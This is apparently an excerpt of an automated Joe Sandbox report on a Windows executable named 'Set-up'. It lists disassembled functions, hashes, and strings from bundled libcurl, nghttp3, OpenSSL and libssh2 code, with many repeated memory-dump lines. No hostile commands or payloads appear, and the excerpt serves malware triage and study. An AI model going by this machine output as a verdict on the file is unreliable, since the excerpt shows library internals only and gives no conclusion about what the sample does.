                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpystrchr$atoistrlen
                                    • String ID: [
                                    • API String ID: 444251876-784033777
                                    • Opcode ID: 595a748c75444655f2f6a8a953d35ecb265f5adeba34239377e00063d7ec3666
                                    • Instruction ID: a9d55be950717b2470a61ea67c702342d1d98bb67dfc006d8f57af6c5d2e093e
                                    • Opcode Fuzzy Hash: 595a748c75444655f2f6a8a953d35ecb265f5adeba34239377e00063d7ec3666
                                    • Instruction Fuzzy Hash: 0CB189719283C15BDB358A23C89477FBBD8EB753C4F28052EE8E5C6182E725DE44A352
                                    APIs
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00C86467
                                    Strings
                                    • mite, xrefs: 00C86688
                                    • unlimited, xrefs: 00C864A1
                                    • %s%s "%s", xrefs: 00C864AA
                                    • %d%02d%02d %02d:%02d:%02d, xrefs: 00C866D5
                                    • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00C86540
                                    • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00C86462
                                    • hsts.c, xrefs: 00C8656B, 00C865CF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: fwrite
                                    • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                                    • API String ID: 3559309478-3911685517
                                    • Opcode ID: 1b1c05f888413975cb5a3e1ece0f9c78390c0a5e1f4dccba49ff0b3f0a8a9c80
                                    • Instruction ID: 21b4f9d017c6de5c46e0715c904786b88122ecd0984c39ff29068171a50a3d6d
                                    • Opcode Fuzzy Hash: 1b1c05f888413975cb5a3e1ece0f9c78390c0a5e1f4dccba49ff0b3f0a8a9c80
                                    • Instruction Fuzzy Hash: 9A81F6B2A08301ABE715EA24DC41F2BB7E5AF94718F18462CF95987392F731DE10C796
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,00CFDB9C,?,00D23BB8,00000000,?,?), ref: 00D26433
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                                    • API String ID: 1222420520-1470553442
                                    • Opcode ID: 2f85a758396706dbe40970771ab892f4c474c9831e0e7418ec1a6f7ad4172e48
                                    • Instruction ID: 4d560825cf39d3dedfdac93279eb977ac72e8de3b2bc6e6a7c2b1f8bae7aaf68
                                    • Opcode Fuzzy Hash: 2f85a758396706dbe40970771ab892f4c474c9831e0e7418ec1a6f7ad4172e48
                                    • Instruction Fuzzy Hash: E671AF70608354AFCB25DF28E881BAE77E5FFA4708F04852CF88997251E730E950CB62
                                    APIs
                                      • Part of subcall function 00CA5EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CA5ED4
                                      • Part of subcall function 00CC4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00CC4F9E
                                    • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00C9EA9B
                                      • Part of subcall function 00CA06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00CA5663,?), ref: 00CA06F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$atoistrcpy
                                    • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                                    • API String ID: 2444498485-4197959747
                                    • Opcode ID: feba3fa5340086ae5ce0a199c0c55bef6a6fb3321e83e310a43463b2b281f052
                                    • Instruction ID: f69d8eca0faf518781e24d92e6fd39672465e56c4c49909e1b640a13f3904ded
                                    • Opcode Fuzzy Hash: feba3fa5340086ae5ce0a199c0c55bef6a6fb3321e83e310a43463b2b281f052
                                    • Instruction Fuzzy Hash: 01F10475904300ABEF24EE14DC8ABA63B94AF60708F088479FD599E2D3F771DA1497A1
                                    APIs
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00E7A61C
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 00E7A632
                                      • Part of subcall function 00E7A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00E7A654,?,PRIVATE KEY), ref: 00E7A0BD
                                      • Part of subcall function 00E7A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00E7A0C8
                                      • Part of subcall function 00E7A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 00E7A0DF
                                      • Part of subcall function 00DF38A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DF397E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcmpstrlen
                                    • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                                    • API String ID: 3853617425-3686562516
                                    • Opcode ID: dc30259200f10560a7688925de381f47150b15fd9f7448ecea3c92507ccccc8a
                                    • Instruction ID: b9006c666c5a198f895f91a170066afa6f362725901aee5ce0eccb1e3dea5602
                                    • Opcode Fuzzy Hash: dc30259200f10560a7688925de381f47150b15fd9f7448ecea3c92507ccccc8a
                                    • Instruction Fuzzy Hash: 24D1BAB2A443057BE7207A60AC07B6F76D99FD0748F089839FD4CB6183F671E91486A3
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 00D6C60E
                                    Strings
                                    • Failed opening remote file, xrefs: 00D6C531
                                    • Timeout waiting for status message, xrefs: 00D6C4FB
                                    • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 00D6C410
                                    • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 00D6C444
                                    • Unable to send FXP_OPEN*, xrefs: 00D6C45B
                                    • feWould block waiting for status message, xrefs: 00D6C4A6
                                    • Response too small, xrefs: 00D6C4E3
                                    • Too small FXP_STATUS, xrefs: 00D6C517
                                    • Too small FXP_HANDLE, xrefs: 00D6C582, 00D6C675
                                    • Unable to allocate new SFTP handle structure, xrefs: 00D6C646
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                                    • API String ID: 3510742995-1499184223
                                    • Opcode ID: 88422f65e7999ea59ba430d541ea65d4f31c8bd2236d430c84612e05b7e251d2
                                    • Instruction ID: 53bbdca1057c0f1e7ead09c37439b4d0347493401c6a872f932cf3d2a0926063
                                    • Opcode Fuzzy Hash: 88422f65e7999ea59ba430d541ea65d4f31c8bd2236d430c84612e05b7e251d2
                                    • Instruction Fuzzy Hash: 49B1E4B09147419BDB10CF28DC45B7BB7A4FF85318F085A2CF49696292E771E918CBB2
                                    APIs
                                    • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,00CCCC57), ref: 00CCF028
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strrchr
                                    • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                                    • API String ID: 3418686817-2910492138
                                    • Opcode ID: 324449a5b3c68166d3b3248647054f54044c4c1b2fe215340b3f342b7c0f3c61
                                    • Instruction ID: fc2b4f61e7c14adec1345222960422faab6e1f581ad7aee879f96129a54af2a0
                                    • Opcode Fuzzy Hash: 324449a5b3c68166d3b3248647054f54044c4c1b2fe215340b3f342b7c0f3c61
                                    • Instruction Fuzzy Hash: 69A158717003449BE7269665EC45F77779AAB92308F0C427DE8588B183D376EE52C7D0
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX,nghttp3_qpack.c,00000447), ref: 00D2ED06
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ringbuf_len(&stream->refs),nghttp3_qpack.c,0000090A), ref: 00D2ED1B
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ringbuf_len(&stream->refs),nghttp3_qpack.c,000006F4), ref: 00D2ED30
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ref->max_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX,nghttp3_qpack.c,000006F9), ref: 00D2ED45
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX,nghttp3_qpack.c,0000091B), ref: 00D2ED5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_qpack.c$nghttp3_ringbuf_len(&stream->refs)$ref->max_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX$ref->min_cnts_pe.index != NGHTTP3_PQ_BAD_INDEX
                                    • API String ID: 1222420520-773409149
                                    • Opcode ID: 91754a59caf62e82115efab73098f90bd9b8fc3ce4de88daf5fb84b67f6ae783
                                    • Instruction ID: 2e5d305cd49bca47b5823be84f7880536e7c74a5909631dad3db3531224b044f
                                    • Opcode Fuzzy Hash: 91754a59caf62e82115efab73098f90bd9b8fc3ce4de88daf5fb84b67f6ae783
                                    • Instruction Fuzzy Hash: 3591E575904310AFCB11DF18EC41A9BB7E5FFA5318F08492CF85957252E730A955CBB2
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00D2A9E8
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,00D271B7,00000001,?,?), ref: 00D2AA04
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,00D271B7,00000001,?,?), ref: 00D2AA19
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,00D271B7,00000001,?,?), ref: 00D2AA2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert$memcpy
                                    • String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
                                    • API String ID: 3718630003-2514804127
                                    • Opcode ID: ea944ad30987660c82451b0730ee139b5a34fa5fdf1328b26e5e95e319679569
                                    • Instruction ID: 2b88603982472345f39dfb8cf73253753502dc784f14a06eae0487d532953423
                                    • Opcode Fuzzy Hash: ea944ad30987660c82451b0730ee139b5a34fa5fdf1328b26e5e95e319679569
                                    • Instruction Fuzzy Hash: 4241CC711042159FDB00DF1ADD80F5A7BE9FF6830CF4A4499E4898B262D731D889CF62
                                    APIs
                                    • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00EC238F
                                    • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00EC23C4
                                    • GetLastError.KERNEL32 ref: 00EC2433
                                      • Part of subcall function 00EC2240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00EBF763,?,?,?,?,?), ref: 00EC2251
                                      • Part of subcall function 00EC2240: WideCharToMultiByte.KERNEL32 ref: 00EC2284
                                      • Part of subcall function 00EC2240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00EC22BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                                    • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                                    • API String ID: 3049598375-4146664032
                                    • Opcode ID: 26538f05689bfcc60e7884ce1a8685ab2485187c41e8cb0780433bf9de411a10
                                    • Instruction ID: fbcd578f639e2461983d9bc54dd92cc23fd0fd7e3cee8e4c107dfb98092df789
                                    • Opcode Fuzzy Hash: 26538f05689bfcc60e7884ce1a8685ab2485187c41e8cb0780433bf9de411a10
                                    • Instruction Fuzzy Hash: AD213DA57513057BF23036BA7C17F3B7A9C9741B0AF04143CFB08B91C7E99799198A62
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00E649A8
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00E64D44
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 00E64E33
